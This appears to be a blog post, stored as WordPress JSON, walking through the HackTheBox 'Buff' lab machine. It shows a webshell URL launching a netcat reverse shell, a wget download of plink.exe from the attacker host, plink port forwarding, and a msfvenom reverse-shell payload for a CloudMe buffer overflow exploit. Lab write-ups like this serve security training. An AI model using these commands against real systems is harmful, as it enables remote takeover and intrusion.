{"id":417,"date":"2020-07-27T17:50:19","date_gmt":"2020-07-27T17:50:19","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=417"},"modified":"2020-08-02T08:48:58","modified_gmt":"2020-08-02T08:48:58","slug":"buff-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/buff-hackthebox-walkthrough\/","title":{"rendered":"Buff hackthebox walkthrough"},"content":{"rendered":"\n

Hey there! This is Shreya and today I am gonna show you how to pwn buff from hackthebox. Buff is an easy level windows machine having a straightforward way to obtain initial foothold. Privilege escalation to Administrator requires to abuse a service that has its exploit available on exploit-db, still its tricky to get through.<\/p>\n\n\n\n

With that being said, let’s get started.<\/p>\n\n\n\n

Enumeration<\/h1>\n\n\n\n

Starting with nmap scan, I found only one open port.<\/p>\n\n\n\n

# nmap -sC -sV -oA buff.nmap 10.10.10.198\n\nNmap scan report for 10.10.10.198\nHost is up (0.53s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE VERSION\n8080\/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL\/1.1.1g PHP\/7.4.6)\n| http-open-proxy: Potentially OPEN proxy.\n|_Methods supported:CONNECTION\n|_http-server-header: Apache\/2.4.43 (Win64) OpenSSL\/1.1.1g PHP\/7.4.6\n|_http-title: mrb3n's Bro Hut\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done at Sun Jul 26 11:45:15 2020 -- 1 IP address (1 host up) scanned in 83.46 seconds<\/pre>\n\n\n\n
Going up there on http:\/\/10.10.10.198:8080<\/span> , A page landed<\/p>\n\n\n\n
\"\"
About fitness<\/figcaption><\/figure>\n\n\n\n
The application had a lots of clickable links. I thought it would be sql injection but it wasn’t. But I saw something in the application’s footer.<\/p>\n\n\n\n
\"\"
The project seems to be taken from projectworlds.in<\/figcaption><\/figure>\n\n\n\n
I googled for term About Fitness projectworld.in and got the one that I was really interested in. It was gym management system having the same functionalities\/UI\/UX that we had in our vulnerable box.<\/p>\n\n\n\n
https:\/\/projectworlds.in\/free-projects\/php-projects\/gym-management-system-project-in-php\/<\/a><\/strong><\/span><\/p>\n\n\n\n
Next, I searched the google if I could find any exploits for this project and you guess it right. I found one on exploit-db<\/p>\n\n\n\n
h<\/a>ttps:\/\/www.exploit-db.com\/exploits\/48506<\/strong><\/span><\/a><\/p>\n\n\n\n
I copied the exploit to my kali machine and ran the exploit.<\/p>\n\n\n\n
# python exploit.py http:\/\/10.10.10.198:8080\/<\/pre>\n\n\n\n
And I got the shell, but it was not good enough. So I read the specifics of exploit to find out what exactly is happening. Here, the upload directory didnt had any authorization check and anybody could access it. Also, there was a file upload vulnerability that can lead to RCE by crafting a malicious php payload that bypasses all the file upload filters.<\/p>\n\n\n\n
The exploit is uploading a malicious payload in kamehameha.php under \/upload having the get parameter as telepathy.<\/p>\n\n\n\n
<\/p>\n\n\n\n
Run the following url and open up a netcat listener on the port specified in the nc.exe command ( nc.exe is already present in the current directory thats accessible.)<\/p>\n\n\n\n
http:\/\/10.10.10.198:8080\/upload\/kamehameha.php?telepathy=nc.exe<\/strong><\/span><\/a> <\/strong><\/span><\/a>10.10.14.32 4444 -e cmd.exe<\/strong><\/span><\/a><\/p>\n\n\n\n
<\/p>\n\n\n\n
And we got the user directly! Awesome!! Lets grab the user.txt<\/p>\n\n\n\n
<\/p>\n\n\n\n
Privilege escalation<\/h1>\n\n\n\n
I fired up winPEAS.exe and the terminal was flowing with results! It was really difficult to find stuff that could really lead to privilege escalation.<\/p>\n\n\n\n
After a bit of searching manual searching in directories, I found that cloudme_1112.exe was present inside C:\\Users\\shaun\\Downloads. It seemed to be an interesting file.<\/p>\n\n\n\n
I googled for cloudme_1112 exploit and luckily found one here<\/strong><\/span><\/a>!!!<\/p>\n\n\n\n
The exploit says run the service followed by executing the script. The payload corresponding to your port and ip has to be generated via msfvenom.<\/p>\n\n\n\n
The service is listening on 127.0.0.1:8888, as can be seen when netstat -ano is executed.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The exploit is written in python, but unfortunately we dont have python present on the box. So there are 2 ways in which we can run our exploit<\/p>\n\n\n\n
  1. Convert the python exploit into the .exe that can be exeuted directly on the vulnerable windows machine.<\/li>
  2. Open a reverse connection using plink that forwards remote port over the local address. <\/li><\/ol>\n\n\n\n
    I’ll be showing you the second method.<\/p>\n\n\n\n
    Very first, we need to download the plink.exe. It can be found here<\/strong><\/span><\/a>.<\/p>\n\n\n\n
    Upload plink.exe to windows machine.<\/p>\n\n\n\n
    PS> wget http:\/\/10.10.14.37\/plink.exe -o plink.exe<\/pre>\n\n\n\n
    Now run the following command on windows to forward 127.0.0.1:8888 (where the service is running) to 127.0.0.1:8888 (on the attacker machine)<\/p>\n\n\n\n
    PS> plink.exe -l root -pw toor  10.10.14.32 -R 8888:127.0.0.1:8888<\/pre>\n\n\n\n
    <\/p>\n\n\n\n
    Now run netstat on attacker machine to see if 127.0.0.1:8888 is listening<\/p>\n\n\n\n
    <\/p>\n\n\n\n
    Yes it is!! and that’s great. Next up, the payload has to be created using msfvenom to get a reverse shell.<\/p>\n\n\n\n
    On attacking machine, execute the following<\/p>\n\n\n\n
    # msfvenom  -p windows\/exec CMD='C:\\xampp\\htdocs\\gym\\upload\\nc.exe 10.10.14.37 4444 -e cmd.exe' -b '\\x00\\x0a\\x0d' -f py -v payload<\/pre>\n\n\n\n
    This will generate a payload that needs to be replaced with the one that is already present in the exploit script.<\/p>\n\n\n\n
    Now open up a nc listener on port 4444 ( as it is specified in the msfvenom payload) and simply execute the python script ( do it atleast 3-4 times until you get a shell).<\/p>\n\n\n\n
    This will execute as if we the executing the script on the windows box and we get a reverse shell on the listener.<\/p>\n\n\n\n
    <\/p>\n\n\n\n
    The administrator is now owned!!! Go grab the root.txt<\/p>\n\n\n\n
    That’s all from the blog post! Thanks for reading.
     See you in the next one. Until then, happy hunting!!! <\/p>\n","protected":false},"excerpt":{"rendered":"
    Hey there! This is Shreya and today I am gonna show you how to pwn buff from hackthebox. Buff is an easy level windows machine having a straightforward way to obtain initial foothold. Privilege escalation to Administrator requires to abuse a service that has its exploit available on exploit-db, still its tricky to get through. […]<\/p>\n","protected":false},"author":1,"featured_media":423,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,109],"tags":[248,250,253,101,252,251,249,254],"class_list":["post-417","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-windows","tag-buff","tag-file-upload","tag-msfvenom","tag-pentest","tag-plink","tag-port-forwarding","tag-projectworls-in","tag-reverse-shell-payload","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/417"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=417"}],"version-history":[{"count":8,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/417\/revisions"}],"predecessor-version":[{"id":431,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/417\/revisions\/431"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/423"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=417"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=417"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=417"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}